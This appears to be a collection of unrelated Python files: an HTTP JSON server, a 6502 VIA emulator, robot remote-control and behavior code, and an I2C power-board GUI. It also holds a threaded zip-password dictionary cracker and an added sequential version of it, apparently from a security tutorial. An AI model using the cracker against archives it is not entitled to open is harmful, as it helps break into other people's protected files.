| source | python |
|---|---|
server.py
|
# -*- coding: utf-8 -*-
import json
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class JsonHandler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
return
# override logging to suppress per-request log output
def log_message(self, format, *args):
return
def do_GET(self):
self._set_headers()
# processing request
return
def do_HEAD(self):
self._set_headers()
return
@staticmethod
def check_json(request):
try:
json.loads(request)
except ValueError:
return False
return True
def do_POST(self):
self._set_headers()
content_len = int(self.headers.getheader('Content-Length', 0))
body = self.rfile.read(content_len)
# validate that the request body is JSON
check = self.check_json(body)
# processing request
# for write use:
# self.wfile.write('{"ok" : "ok"}')
return
class MultiThreadHTTPServer(HTTPServer):
def process_request(self, request, client_address):
thread = Thread(target=self.__new_request, args=(self.RequestHandlerClass, request, client_address, self))
thread.start()
def __new_request(self, handlerclass, request, address, server):
handlerclass(request, address, server)
self.shutdown_request(request)
class HttpGate():
@staticmethod
def http_gate():
httpd = MultiThreadHTTPServer(('', 20756), JsonHandler)
httpd.serve_forever()
HttpGate().http_gate()
|
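A minimal client sketch (not part of the dump above) for exercising the JSON gate: it assumes the server is already running on localhost:20756, and because do_POST never writes a body, the read below returns an empty string.
import json
try:
    from urllib.request import Request, urlopen  # Python 3
except ImportError:
    from urllib2 import Request, urlopen  # Python 2, matching server.py
payload = json.dumps({"ping": "pong"}).encode("utf-8")
req = Request("http://localhost:20756/", data=payload,
              headers={"Content-Type": "application/json"})
print(urlopen(req).read())  # empty body: the handler only sends headers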
via65c02.py
|
import sys
import time
import threading
from utils import console
class VIA():
SR = 4
SET_CLEAR = 128
def __init__(self, start_addr, mpu):
self.mpu = mpu
self.VIA_SR = start_addr + 0x0a # shift register
self.VIA_IFR = start_addr + 0x0d # interrupt flags register
self.VIA_IER = start_addr + 0x0e # interrupt enable register
self.SRThread = False
self.escape = False
self.quit = False
self.dbFlag = False
self.name = 'VIA'
# init
self.reset()
self.install_interrupts()
def check_debug(self, flag=None):
if flag is not None:
self.dbFlag = flag
return self.dbFlag
def install_interrupts(self):
def getc(address):
char = console.getch_noblock(sys.stdin)
if char:
byte = ord(char)
if self.escape:
self.escape = False
if byte == 0x51 or byte == 0x71: # handles <ESC>Q or <ESC>q
byte = 0
self.quit = True
elif byte == 0x44 or byte == 0x64: # handles <ESC>D or <ESC>d
byte = 0
self.dbFlag = True
else:
if byte == 0x1b:
self.escape = True
byte = 0
else:
self.mpu.memory[self.VIA_IFR] &= 0xfb
else:
byte = 0
return byte
def SR_enable(address, value):
if value & self.SET_CLEAR:
# enable interrupts
if value & self.SR and not self.SRThread:
t = threading.Thread(target=SR_thread, daemon = True)
self.SRThread = True
t.start()
else:
# disable interrupts
if value & self.SR and self.SRThread:
self.SRThread = False
def SR_thread():
while(self.SRThread):
time.sleep(.05) # delay needed to allow processing of interrupt prior to setting it again *** TODO: would be nice to eliminate this with a flag or something ***
if (self.mpu.p & self.mpu.INTERRUPT == 0) and self.mpu.IRQ_pin:
if console.kbhit():
self.mpu.memory[self.VIA_IFR] |= 0x04
self.mpu.IRQ_pin = 0
count_irq = 0 # we need a short delay here
while count_irq < 100:
count_irq += 1
self.mpu.memory.subscribe_to_write([self.VIA_IER], SR_enable)
self.mpu.memory.subscribe_to_read([self.VIA_SR], getc)
def reset(self):
self.mpu.memory[self.VIA_IER] = 0
self.mpu.memory[self.VIA_IFR] = 0
#def irq(self):
#return (IFR6 and IER6) or (IFR5 and IER5) or (IFR4 and IER4) or (IFR3 and IER3) or (IFR2 and IER2) or (IFR1 and IER1) or (IFR0 and IER0)
#return (self.mpu.memory[self.VIA_IFR] and self.SR) and ((self.mpu.memory[self.VIA_IER] and self.SR))
|
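via65c02.py assumes a memory object exposing subscribe_to_read/subscribe_to_write hooks (and an MPU with IRQ_pin and INTERRUPT attributes). The sketch below is not the original emulator's class; it is a self-contained illustration of the hook pattern the VIA relies on, so that writes to the IER register reach SR_enable and reads of the SR register go through getc.
class ObservableMemory(object):
    """64 KiB byte array that fires callbacks for watched addresses (illustrative)."""
    def __init__(self, size=0x10000):
        self._bytes = [0] * size
        self._read_subs = {}   # address -> callback(address) returning a byte
        self._write_subs = {}  # address -> callback(address, value)
    def subscribe_to_read(self, addresses, callback):
        for address in addresses:
            self._read_subs[address] = callback
    def subscribe_to_write(self, addresses, callback):
        for address in addresses:
            self._write_subs[address] = callback
    def __getitem__(self, address):
        callback = self._read_subs.get(address)
        return callback(address) if callback else self._bytes[address]
    def __setitem__(self, address, value):
        self._bytes[address] = value
        callback = self._write_subs.get(address)
        if callback:
            callback(address, value)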
consoleControl.py
|
#!/usr/bin/python
import socket
import numpy as np
import sys
import signal
import time
import threading
from threading import Thread
import curses
from curses import wrapper
from curses import ascii
"""
@brief Keyboard control for the QuickBot.
@description This program is used to drive the QuickBot via the keyboard
@author Rowland O'Flaherty (rowlandoflaherty.com)
@author Marty Kube marty@beavercreekconsulting.com
@date 2015-04-20
@note Works with 64-bit python
@version: 1.0
@copyright: Copyright (C) 2014, Georgia Tech Research Corporation see
the LICENSE file included with this software
"""
# Constants
LEFT = 0
RIGHT = 1
FORWARD = 1
BACKWARD = -1
SEND_FLAG = True
# Get input arguments
LOCAL_IP = "192.168.2.1" # Computer IP address (change to correct value)
QB_IP = "192.168.1.160" # QuickBot IP address (change to correct value)
PORT = 5005
if len(sys.argv) > 2:
print('Invalid number of command line arguments.')
print('Usage:')
print('>> consoleControl.py <robot-ip>')
print('Example:')
print('>> consoleControl.py ', QB_IP)
sys.exit()
if len(sys.argv) == 2:
QB_IP = sys.argv[1]
class QuickBot:
# Parameters -- (LEFT, RIGHT)
pwmMinVal = [35, 35]
pwmMaxVal = [100, 100]
# State -- (LEFT, RIGHT)
pwm = [0.0, 0.0]
pwmDelta = [2, 2]
def __init__(self, socket):
self.socket = socket
# last command sent
self.cmdStr = ''
def send(self):
self.socket.sendto(self.cmdStr, (QB_IP, PORT))
def receive(self):
return self.socket.recv(2048)
def stop(self):
self.pwm = [0, 0]
def update(self):
# Slow down
slowDownRate = 2
for side in range(0, 2):
if self.pwm[side] > 0:
self.accelerateByVal(-1*slowDownRate, side)
elif self.pwm[side] < 0:
self.accelerateByVal(slowDownRate, side)
def accelerate(self, dir, side):
self.accelerateByVal(dir*self.pwmDelta[side], side)
def accelerateByVal(self, val, side):
way = np.sign(val)
if self.pwm[side] == 0:
self.pwm[side] = way*self.pwmMinVal[side]
elif (self.pwm[side] == self.pwmMinVal[side] and way < 0) or (
self.pwm[side] == -1*self.pwmMinVal[side] and way > 0):
self.pwm[side] = 0
else:
self.pwm[side] = self.pwm[side] + val
if self.pwm[side] > 0:
self.pwm[side] = min(self.pwm[side], self.pwmMaxVal[side])
elif self.pwm[side] < 0:
self.pwm[side] = max(self.pwm[side], -1*self.pwmMaxVal[side])
def setPWM(self):
self.cmdStr = "$PWM=" + str(QB.pwm[LEFT]) + "," + \
str(QB.pwm[RIGHT]) + "*\n"
self.send()
def getIR(self):
self.cmdStr = "$IRVAL?*\n"
self.send()
def getEncoderVal(self):
self.cmdStr = "$ENVAL?*\n"
self.send()
def resetEncoder(self):
self.cmdStr = "$RESET*\n"
self.send()
def healthCheck(self):
self.cmdStr = "$CHECK*\n"
self.send()
def calibrate(self):
self.pwm[LEFT] = 90
self.pwm[RIGHT] = 80
self.setPWM()
def end(self):
self.cmdStr = "$END*\n"
self.send()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
print('Binding to %s %d' % (LOCAL_IP, PORT))
sock.bind((LOCAL_IP, PORT))
QB = QuickBot(sock)
class Console:
"""
Class to interact with screen
"""
TITLE_ROW = 0
SENT_ROW = 1
RECEIVE_ROW = 2
PROMPT_ROW = 3
def __init__(self):
self.sentMsg = ''
self.receivedMsg = ''
self.promptMsg = ''
self.screen = None
def sent(self, msg = ''):
self.sentMsg = msg
self.paint()
def received(self, msg):
self.receivedMsg = msg
self.paint()
def prompt(self, msg = ' '):
self.promptMsg = msg
self.paint()
def paint(self):
if self.screen is not None:
self.screen.addstr(self.TITLE_ROW, 0, ' ' * curses.COLS, curses.A_REVERSE)
self.screen.addstr( self.TITLE_ROW, 0, 'Quickbot Control', curses.A_REVERSE)
self.screen.addstr(self.SENT_ROW, 0, 'Sent : ')
self.screen.addstr(self.sentMsg)
self.screen.addstr(self.RECEIVE_ROW, 0, 'Received: ')
self.screen.addstr(self.receivedMsg)
self.screen.addstr(curses.LINES - 3, 0, ' ' * curses.COLS, curses.A_REVERSE)
self.screen.addstr(curses.LINES - 3, 0, 'Forward/Backward: up/down arrow, Left/Right: left/right arrow, Stop: space', curses.A_REVERSE)
self.screen.addstr(curses.LINES - 2, 0, ' ' * curses.COLS, curses.A_REVERSE)
self.screen.addstr(curses.LINES - 2, 0, 'Left Wheel: a/z, Right Wheel: s/x', curses.A_REVERSE)
self.screen.move(curses.LINES - 1, 0)
self.screen.addstr(' ' * (curses.COLS - 1), curses.A_REVERSE)
self.screen.addstr(curses.LINES - 1, 0, 'Quit: q, Encoder: e, IR: r, Reset Encoder: t, Check Status: c', curses.A_REVERSE)
self.screen.addstr(curses.LINES - 4, 0, '> ')
self.screen.addstr(self.promptMsg)
self.screen.refresh()
def run(self, screen):
self.screen = screen
self.paint()
while True:
c = screen.getch()
if curses.ascii.islower(c):
self.prompt(chr(c))
# End program
if c == curses.ascii.ESC:
break
if c == ord('q'):
break
# Stop robot
if c == curses.ascii.SP:
QB.stop()
QB.setPWM()
# Move right wheel
elif c == ord('s'):
QB.accelerate(FORWARD, LEFT)
QB.setPWM()
elif c == ord('x'):
QB.accelerate(BACKWARD, LEFT)
QB.setPWM()
# Move left wheel
elif c == ord('a'):
QB.accelerate(FORWARD, RIGHT)
QB.setPWM()
elif c == ord('z'):
QB.accelerate(BACKWARD, RIGHT)
QB.setPWM()
# Move forward/backward
elif c == curses.KEY_UP:
QB.accelerate(FORWARD, LEFT)
QB.accelerate(FORWARD, RIGHT)
QB.setPWM()
elif c == curses.KEY_DOWN:
QB.accelerate(BACKWARD, LEFT)
QB.accelerate(BACKWARD, RIGHT)
QB.setPWM()
# Turn left/right
elif c == curses.KEY_RIGHT:
QB.accelerate(BACKWARD, LEFT)
QB.accelerate(FORWARD, RIGHT)
QB.setPWM()
elif c == curses.KEY_LEFT:
QB.accelerate(FORWARD, LEFT)
QB.accelerate(BACKWARD, RIGHT)
QB.setPWM()
# Encoder query
elif c == ord('e'):
QB.getEncoderVal()
# Encoder reset
elif c == ord('t'):
QB.resetEncoder()
# IR query
elif c == ord('r'):
QB.getIR()
# Health Check
elif c == ord('c'):
QB.healthCheck()
# Calibrate motor
elif c == ord('m'):
QB.calibrate()
# Don't know this character
else:
self.prompt()
# Update display for last command
self.sent(QB.cmdStr)
console = Console()
def poll():
count = 1
while True:
try:
data = sock.recv(2048)
console.received(data)
except socket.error as mesg:
pass
time.sleep(0.1)
def main(screen):
t = threading.Thread(target=poll)
t.daemon = True
t.start()
console.run(screen)
wrapper(main)
|
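Underneath the curses UI, consoleControl.py only formats "$...*\n" command strings and sends them over UDP. A minimal sketch of the same wire protocol without curses, using the same placeholder robot address as above:
import socket
import time
QB_IP, PORT = "192.168.1.160", 5005  # placeholder address, as in consoleControl.py
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def send(cmd):
    sock.sendto(cmd.encode("ascii"), (QB_IP, PORT))
send("$PWM=50,50*\n")  # both wheels forward at PWM 50
time.sleep(1.0)
send("$PWM=0,0*\n")    # stop
send("$CHECK*\n")      # health check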
gui2.py
|
import gi
import smbus2
import CSPB
import os.path
import time
import threading
import queue
from datetime import datetime
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib, Gdk
class gui2:
"""
A class to generate a graphical user interface and provide i2c
communications with the cluster system power board. This class handles the
callback function generated by the glade layout manager.
Attributes
----------
None
Methods
-------
set_power(value):
Sends the power command value to the cluster system power board.
do_destroy_window(self, widget, data=None):
do_i2c_device_address_changed
do_rescan_button_clicked
do_send_clicked
do_read_registers_clicked
do_register_write_enable
do_write_register_clicked
do_IOError_close_clicked
populate_bus_num
populate_device_num
init_cspb_command_type_group
set_widget_references
get_device_on_bus
update_power_display
set_power_indicator_text
update_progress
show_busy_cursor
get_register_data
update_register_display
process_shutdown_commands
get_cspb
rescan_i2c_bus
get_available_i2c_bus_numbers
clear_power_indicators
clear_slot_command_selection
clear_register_display
do_io_error_dialog_destroy
"""
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("Test2.glade")
self.builder.connect_signals(self)
self.set_widget_references()
self.populate_bus_num(self.get_available_i2c_bus_numbers())
self.populate_device_num(self.get_device_on_bus(int(self.bus_combobox.get_active_text())))
self.init_cspb_command_type_group()
self.gui = self.builder.get_object("CSPB Command Window")
self.gtk_box = self.builder.get_object("gtk_box")
self.gui.show()
def main(self):
Gtk.main()
def do_destroy_window(self, widget, data=None):
print("destroy_window()")
Gtk.main_quit()
def do_i2c_device_address_changed(self, widget, data=None):
print("do_i2c_device_address_changed()")
self.update_power_display()
def do_rescan_button_clicked(self, widget, data=None):
print("do_rescan_button_clicked()")
self.clear_power_indicators()
self.clear_slot_command_selection()
self.rescan_i2c_bus()
def do_send_clicked(self, widget, data=None):
print("do_send_clicked()")
command_set = 0 # decimal value representing the slots selected.
number_of_slots_selected = 0
for slot in range (1, 5):
command = "slot_command_"
command += str(slot)
slot_command = self.builder.get_object(command)
slot_command_value = int(slot_command.get_active())
if (slot_command_value == 1):
number_of_slots_selected += 1
self.set_power_indicator_text(slot-1, " ")
shift_command = slot_command_value << slot-1
command_set = command_set + shift_command
try:
cspb = self.get_cspb()
time.sleep(.01)
except Exception as e:
print("do_send_clicked(): input error! ", e)
return
# Determine which command to send to the CSPB.
if (self.rb_shutdown.get_active() == True):
if (number_of_slots_selected == 0):
return
shutdown_timeout = cspb.read_register(CSPB.CSPB.SHTDWN_TIME_OUT_RGSTR_ADDR) # already in seconds.
power_down_hold_delay = (cspb.read_register(CSPB.CSPB.PWR_DWN_SGNL_DRTN_RGSTR_ADDR)*20)/1000 # convert from milliseconds to seconds.
max_trys = number_of_slots_selected*(shutdown_timeout + power_down_hold_delay)+1
print("Max trys ", max_trys, "command_set: ", str(command_set))
cspb.shutdown(command_set)
time.sleep(.1)
work_thread = threading.Thread(target=self.process_shutdown_commands, args=(cspb, max_trys))
work_thread.start()
elif (self.rb_signal_only.get_active() == True):
if (number_of_slots_selected == 0):
return
cspb.signal_shutdown(command_set)
elif (self.rb_power.get_active() == True):
cspb.set_power(command_set)
time.sleep(.1)
self.update_power_display()
def do_read_registers_clicked(self, widget, data=None):
print("do_read_registers_clicked()")
bus_id = int(self.bus_combobox.get_active_text())
i2c_addr = int(self.addr_combobox.get_active_text())
self.data_queue = queue.Queue()
work_thread = threading.Thread(target=self.get_register_data, args=(bus_id, i2c_addr, self.data_queue))
work_thread.start()
def do_register_write_enable(self, widget, data=None):
print("do_register_write_enable()", widget.get_name())
if (widget.get_name() == "enable_0"):
self.enable_box = self.builder.get_object('register_write_enable_0')
self.input_box = self.builder.get_object('register_address_input_0')
elif (widget.get_name() == "enable_1"):
self.enable_box = self.builder.get_object('register_write_enable_1')
self.input_box = self.builder.get_object('register_address_input_1')
elif (widget.get_name() == "enable_2"):
self.enable_box = self.builder.get_object('register_write_enable_2')
self.input_box = self.builder.get_object('register_address_input_2')
elif (widget.get_name() == "enable_3"):
self.enable_box = self.builder.get_object('register_write_enable_3')
self.input_box = self.builder.get_object('register_address_input_3')
elif (widget.get_name() == "enable_4"):
self.enable_box = self.builder.get_object('register_write_enable_4')
self.input_box = self.builder.get_object('register_address_input_4')
elif (widget.get_name() == "enable_5"):
self.enable_box = self.builder.get_object('register_write_enable_5')
self.input_box = self.builder.get_object('register_address_input_5')
if self.enable_box.get_active():
self.input_box.set_visible(True)
else:
self.input_box.set_visible(False)
def do_write_register_clicked(self, widget, data=None):
print("do_write_register_clicked()")
try:
cspb = self.get_cspb()
except Exception as e:
print("do_write_register_clicked(): ", e)
return
write_enable_prefix = "register_write_enable_"
input_box_prefix = "register_address_input_"
for register in range (0, 6):
write_enable_ID = write_enable_prefix +str(register)
write_enable_object = self.builder.get_object(write_enable_ID)
if write_enable_object.get_active():
input_box_ID = input_box_prefix +str(register)
print("input box id: ", input_box_ID, "register: ", register)
input_box_object = self.builder.get_object(input_box_ID)
input_buffer = input_box_object.get_buffer()
cspb.write_register(register, int(input_buffer.get_text()))
time.sleep(.1) # allow bus to clear before next command.
self.do_read_registers_clicked(widget, data=None)
def do_IOError_close_clicked(self, widget, data=None):
print("do_IOError_close_clicked")
self.io_error_dialog.hide()
def populate_bus_num(self, list_store):
print("populate_bus_num()")
combobox = self.builder.get_object('Bus_Number_Combobox')
combobox.set_model(list_store)
combobox.set_active(0)
def populate_device_num(self, list_store):
print("populate_device_num()")
self.addr_combobox.set_model(list_store)
self.addr_combobox.set_active_id(None)
GLib.idle_add(self.show_busy_cursor, False)
def init_cspb_command_type_group(self):
self.rb_shutdown.set_active(True)
def set_widget_references(self):
self.rb_shutdown = self.builder.get_object('command_type_shutdown')
self.rb_signal_only = self.builder.get_object('command_type_shutdown_signal_only')
self.rb_power = self.builder.get_object('command_type_power')
self.bus_combobox = self.builder.get_object('Bus_Number_Combobox')
self.addr_combobox = self.builder.get_object('Device_Addr_Combobox')
self.progress_bar = self.builder.get_object('progress_bar')
self.progress_bar.set_size_request(100,30)
self.io_error_dialog = self.builder.get_object('register_IO_error_dialog')
def get_device_on_bus(self, busNum):
devices = Gtk.ListStore(str)
try:
bus = smbus2.SMBus(busNum)
for addr in range (8, 178):
GLib.idle_add(self.update_progress, (addr+1)/178)
try:
bus.write_quick(addr)
devices.append([str(addr)])
except IOError:
pass
except:
pass
GLib.idle_add(self.update_progress, 0)
return devices
def update_power_display(self):
print("update_power_display()")
for attempt in range(0, 3): # make up to 3 attempts to get power data.
try:
cspb = self.get_cspb()
power_state = cspb.read_register(CSPB.CSPB.PWR_STTS_RGSTR_ADDR)
print("power state ", str(power_state))
for indicator_num in range (0,4):
if (power_state & (1 << indicator_num) >= 1):
self.set_power_indicator_text(indicator_num, "On")
else:
self.set_power_indicator_text(indicator_num, "Off")
return
except Exception as e:
print("display error", e)
time.sleep(.5) # delay before trying again.
def set_power_indicator_text(self, indicator_num, text):
print("set_power_indicator_text()")
display_name = "power_indicator_" +str(indicator_num)
display_object = self.builder.get_object(display_name)
display_object.set_label(text)
def update_progress(self, fraction):
print("update_progress()")
self.progress_bar.set_fraction(fraction)
return False
def show_busy_cursor(self, visible):
print("show_busy_cursor()")
if visible:
self.gui.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.WATCH))
else:
self.gui.get_window().set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def get_register_data(self, bus_id, i2c_addr, data_queue):
print("get_register_data()")
GLib.idle_add(self.show_busy_cursor, True)
GLib.idle_add(self.clear_register_display)
try:
cspb = self.get_cspb()
number_of_registers_to_retreive = 6 # The first 6 registers are user programmable.
for register_num in range (0,number_of_registers_to_retreive):
data_queue.put(cspb.read_register(register_num))
GLib.idle_add(self.update_progress, (register_num+1)/number_of_registers_to_retreive)
time.sleep(.1) # Give the i2c bus time to stabilize.
except Exception as e:
print("get_register_data() error: ", e)
GLib.idle_add(self.update_progress, 0)
GLib.idle_add(self.show_busy_cursor, False)
GLib.idle_add(self.io_error_dialog.show)
# TODO - Popup an error message.
return
GLib.idle_add(self.update_progress, 0)
GLib.idle_add(self.update_register_display, data_queue)
GLib.idle_add(self.show_busy_cursor, False)
return
def update_register_display(self, data_queue):
print("update_register_display()")
display_name_prefix = "register_value_display"
number_of_registers = 6 # The first 6 registers are user programmable.
for register_num in range (0,number_of_registers):
display_name = display_name_prefix + str(register_num)
display_object = self.builder.get_object(display_name)
display_buffer = display_object.get_buffer()
display_buffer.set_text(str(self.data_queue.get()))
return False
def process_shutdown_commands(self, cspb, max_trys):
print("process_shutdown_commands()")
in_shutdown = True
attempts = 0
GLib.idle_add(self.show_busy_cursor, (True))
while (in_shutdown == True):
print("get is_shutting_down", str(datetime.now()))
attempts += 1
print("attempts ", str(attempts))
GLib.idle_add(self.update_progress, (attempts/max_trys))
if (attempts > max_trys):
print("Max trys reached")
in_shutdown = False
try:
is_shutting_down = cspb.read_register(CSPB.CSPB.IN_SHUTDOWN_RGSTR_ADDR) # any read command will do
if (is_shutting_down):
pass # just wait
else:
in_shutdown = False
except IOError:
print("IOError")
print("in_shutdown = ", in_shutdown)
time.sleep(1)
GLib.idle_add(self.update_progress, 0)
GLib.idle_add(self.update_power_display)
GLib.idle_add(self.show_busy_cursor, (False))
def get_cspb(self):
print("get_cspb()")
bus_combobox = self.builder.get_object('Bus_Number_Combobox')
bus_number = int(bus_combobox.get_active_text())
addr_combobox = self.builder.get_object('Device_Addr_Combobox')
i2c_address = int(addr_combobox.get_active_text())
cspb = CSPB.CSPB(bus_number, i2c_address)
return cspb
def rescan_i2c_bus(self):
print("rescan_i2c_bus()")
GLib.idle_add(self.show_busy_cursor, True)
self.populate_bus_num(self.get_available_i2c_bus_numbers())
self.populate_device_num(self.get_device_on_bus(int(self.bus_combobox.get_active_text())))
def get_available_i2c_bus_numbers(self):
print("get_available_i2c_bus_numbers()")
store = Gtk.ListStore(str)
for i2c_num in range (0, 10):
file_path = "/dev/i2c-"
file_path += str(i2c_num)
if os.path.exists(file_path):
store.append([str(i2c_num)])
return store
def clear_power_indicators(self):
print("clear_power_indicators()")
for indicator_num in range (0,4):
self.set_power_indicator_text(indicator_num, " ")
def clear_slot_command_selection(self):
print("clear_slot_command_selection()")
for slot in range (1, 5):
command = "slot_command_"
command += str(slot)
slot_command = self.builder.get_object(command)
slot_command.set_active(False)
def clear_register_display(self):
print("clear_register_display()")
display_name_prefix = "register_value_display"
number_of_registers = 6 # The first 6 registers are user programmable.
for register_num in range (0,number_of_registers):
display_name = display_name_prefix + str(register_num)
display_object = self.builder.get_object(display_name)
display_buffer = display_object.get_buffer()
display_buffer.set_text("")
return False
def do_io_error_dialog_destroy(self, widget, data=None):
print("do_io_error_dialog_destroy()")
self.io_error_dialog.hide()
return True # Prevent dialog from being destroyed.
if __name__ == '__main__':
app = gui2()
app.main()
|
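A console-only sketch of the scan that get_available_i2c_bus_numbers() and get_device_on_bus() perform in gui2.py, assuming smbus2 is installed and /dev/i2c-* buses are present; it probes the standard 7-bit address range with the same write_quick() call.
import os.path
import smbus2
for bus_num in range(0, 10):
    if not os.path.exists("/dev/i2c-%d" % bus_num):
        continue
    bus = smbus2.SMBus(bus_num)
    found = []
    for addr in range(0x08, 0x78):  # usable 7-bit address range
        try:
            bus.write_quick(addr)   # same probe the GUI uses
            found.append(hex(addr))
        except IOError:
            pass
    print("bus %d: %s" % (bus_num, ", ".join(found) or "no devices"))
    bus.close()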
unzip.py
|
# -*- coding: utf-8 -*-
import zipfile
import optparse
from threading import Thread
def extractFile(zFile,password):
'''
:param zFile: an open zipfile.ZipFile object to extract from
:param password: a candidate password (one line of the dictionary file) to try when extracting the archive
:return: None
'''
try:
zFile.extractall(pwd=password)
print '[+] Found password:' + password + '\n'
except :
pass
def main():
'''
To follow this code you need to know what threading is and what
optparse is. If you don't, don't worry about it; we will explain
both in the next chapter.
Expansion:
--------
optparse is similar to "argparse" in Python.
What is exit(0)?
https://blog.csdn.net/geekleee/article/details/52794826
'''
parser = optparse.OptionParser('usage: %prog -f <zipfile> -d <dictionary>')
parser.add_option('-f',dest = 'zname',type='string',
help = 'specify zip file')
parser.add_option('-d',dest = 'dname',type='string',
help = 'specify dictionary file')
(options,args) = parser.parse_args()
if (options.zname == None) or (options.dname == None):
print parser.usage
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
passFile = open(dname)
for line in passFile.readlines():
password = line.strip('\n')
t = Thread(target=extractFile,args=(zFile,password))
t.start()
print t.getName() + ' has started'
if __name__ == '__main__':
main()
|
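The same dictionary attack can also be written sequentially, which keeps the control flow easy to follow and stops at the first password that extracts cleanly; the zip and dictionary file names below are placeholders.
import zipfile
def crack(zip_path, dict_path):
    zfile = zipfile.ZipFile(zip_path)
    with open(dict_path) as handle:
        for line in handle:
            password = line.strip()
            try:
                # ZipFile.extractall expects bytes for pwd on Python 3
                zfile.extractall(pwd=password.encode("utf-8"))
                return password
            except Exception:
                continue
    return None
print(crack("evil.zip", "dictionary.txt"))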
behavior.py
|
from itertools import izip
from threading import Thread, Lock
import time
import math
from enum import Enum
from localization import RobotPose
from camera_geometry import CamGeom
from threadsafe import ThreadSafe
from walker import Walker, OdoListener
class Stance(Enum):
FACE_DOWN = 0
FACE_UP = 1
RIGHT_SHOULDER_UP = 2
LEFT_SHOULDER_UP = 3
STAND = 4
class StanceDeterminator:
_switcher = (
lambda v: Stance.FACE_DOWN if v > 0.0 else Stance.FACE_UP,
lambda v: Stance.LEFT_SHOULDER_UP if v > 0.0 else Stance.RIGHT_SHOULDER_UP,
lambda v: Stance.STAND,
)
def __init__(self, robot):
self.robot = robot
def determinate(self):
data = self.robot.accelerometer.acceleration()['data']
index, val = max(enumerate(data), key=lambda x: abs(x[1]))
return self._switcher[index](val)
class Behavior:
def run(self):
pass
def reset(self):
pass
def is_done(self):
return True
def stop(self):
pass
class UnknownBehavior(Behavior):
def run(self):
pass
# print "Warning: Unknown behavior!"
class SwitcherBasedBehavior(Behavior):
def __init__(self, robot, pose_handler, pose_switcher, stance_determinator, walker):
self.robot = robot
self.pose_handler = pose_handler
self.pose_switcher = pose_switcher
self.stance_determinator = stance_determinator
self.walker = walker
self._finished = False
self._play = False
def prepare(self):
pass
def get_instances(self):
raise NotImplementedError
def finalize(self):
pass
def reset(self):
self.pose_switcher.stop()
self._finished = False
self._play = False
def run(self):
if not self._finished and self._play:
self.walker.stop()
self.prepare()
self.robot.joints.hardness(0.9)
switch = self.get_instances()
if switch:
aa = self.robot.locomotion.autoapply.enable()
self.robot.locomotion.autoapply.enable(False)
self.pose_switcher.switch_to(*switch)
self.robot.locomotion.autoapply.enable(aa)
self.finalize()
self._finished = True
def start(self):
self._play = True
def is_done(self):
return self._finished
def stop(self):
self.pose_switcher.stop()
self._finished = True
self._play = False
class StandingUpBehavior(SwitcherBasedBehavior):
def prepare(self):
self.robot.joints.hardness(0.0)
self.state = self.stance_determinator.determinate()
time.sleep(1.0)
counter = 10
while all(self.state != st for st in (Stance.FACE_DOWN, Stance.FACE_UP)) and counter > 0:
time.sleep(1.0)
self.state = self.stance_determinator.determinate()
counter -= 1
if counter <= 0:
self.stop()
self.robot.joints.hardness(0.85)
def get_instances(self):
if self.state == Stance.FACE_DOWN:
return "face_floor", "walking_pose"
elif self.state == Stance.FACE_UP:
return "face_up_init", "walking_pose"
def finalize(self):
self.robot.joints.hardness(0.8)
self.stop()
class KickBehavior(SwitcherBasedBehavior):
_left_leg = True
def prepare(self):
self.robot.joints.hardness(0.8)
def set_left_leg(self, left=True):
self._left_leg = left
def get_instances(self):
return "prepare_left_kick" if self._left_leg else "prepare_right_kick", "walking_pose"
def finalize(self):
time.sleep(1.0)
class WalkBehavior(Behavior):
STOP = 0
SMART_GO_TO = 1
LINEAR_GO_TO = 2
GO_AROUND = 3
def __init__(self, walker):
self._state = WalkBehavior.STOP
self._applied = False
self._walker = walker
self._args = None
self._lock = Lock()
def run(self):
if not self._applied:
with self._lock:
(
lambda: self._walker.stop(),
lambda: self._walker.smart_go_to(*self._args),
lambda: self._walker.linear_go_to(*self._args),
lambda: self._walker.go_around(*self._args)
)[self._state]()
self._applied = True
def smart_go_to(self, x, y, speed):
self._upd_args(WalkBehavior.SMART_GO_TO, x, y, speed)
def go_around(self, angle, scale=1.0):
self._upd_args(WalkBehavior.GO_AROUND, angle, scale)
def linear_go_to(self, x, y, theta):
self._upd_args(WalkBehavior.LINEAR_GO_TO, x, y, theta)
def _upd_args(self, state, *args):
with self._lock:
if self._walker.is_done() or self._state != state or self._args != args:
self._applied = False
self._state = state
self._args = args
def stop(self):
self._state = WalkBehavior.STOP
self._applied = True
self._walker.stop()
def is_done(self):
return self._walker.is_done()
class BehaviorHandler(OdoListener):
FINDING_SECTOR_ANGLE = math.radians(60.0)
HEAD_PITCH_STEP = math.radians(30.0)
HEAD_YAW_STEP = math.radians(15.0)
SLEEP_TIME = 0.01
def __init__(self, robot, walker, pose_handler, pose_switcher, cam, localization):
self.fall_indicator_count = 3
self._robot = robot
self._walker = walker
self._cam = cam
self._localization = localization
self._pose_handler = pose_handler
self._pose_switcher = pose_switcher
self._stance_determinator = StanceDeterminator(robot)
self._iterrupt = False
self._behavior = UnknownBehavior()
self._lock = Lock()
self._worker = Thread(target=BehaviorHandler.__worker, args=(self,))
self._worker.start()
self.odo = RobotPose(0.0, 0.0, 0.0)
def notify(self, frodo):
self.odo.odoTranslate(frodo[0], frodo[1], frodo[2])
def __worker(self):
self._lock.acquire()
try:
while not self._iterrupt:
behavior = self._behavior
self._lock.release()
try:
behavior.run()
time.sleep(self.SLEEP_TIME)
finally:
self._lock.acquire()
finally:
self._lock.release()
def __set_behavior(self, behavior, *args, **kwargs):
with self._lock:
if not isinstance(self._behavior, behavior):
self._behavior.stop()
self._behavior = behavior(*args, **kwargs)
def run(self):
counter = 0
start = time.time()
left_leg = True
self.__set_behavior(UnknownBehavior)
stance = self._stance_determinator.determinate()
if stance == Stance.STAND:
self._pose_handler.set_pose("walking_pose", 2.0)
timer = 0
ball_found = False
ball = {
"x": 0,
"y": 0,
"width": 0,
"height": 0,
}
timestamp = 0
pix = [0.0, 0.0]
reached = False
dode = 0
fff = False
initialized = False
tuc = None
print "Behavior was started"
while not self._iterrupt:
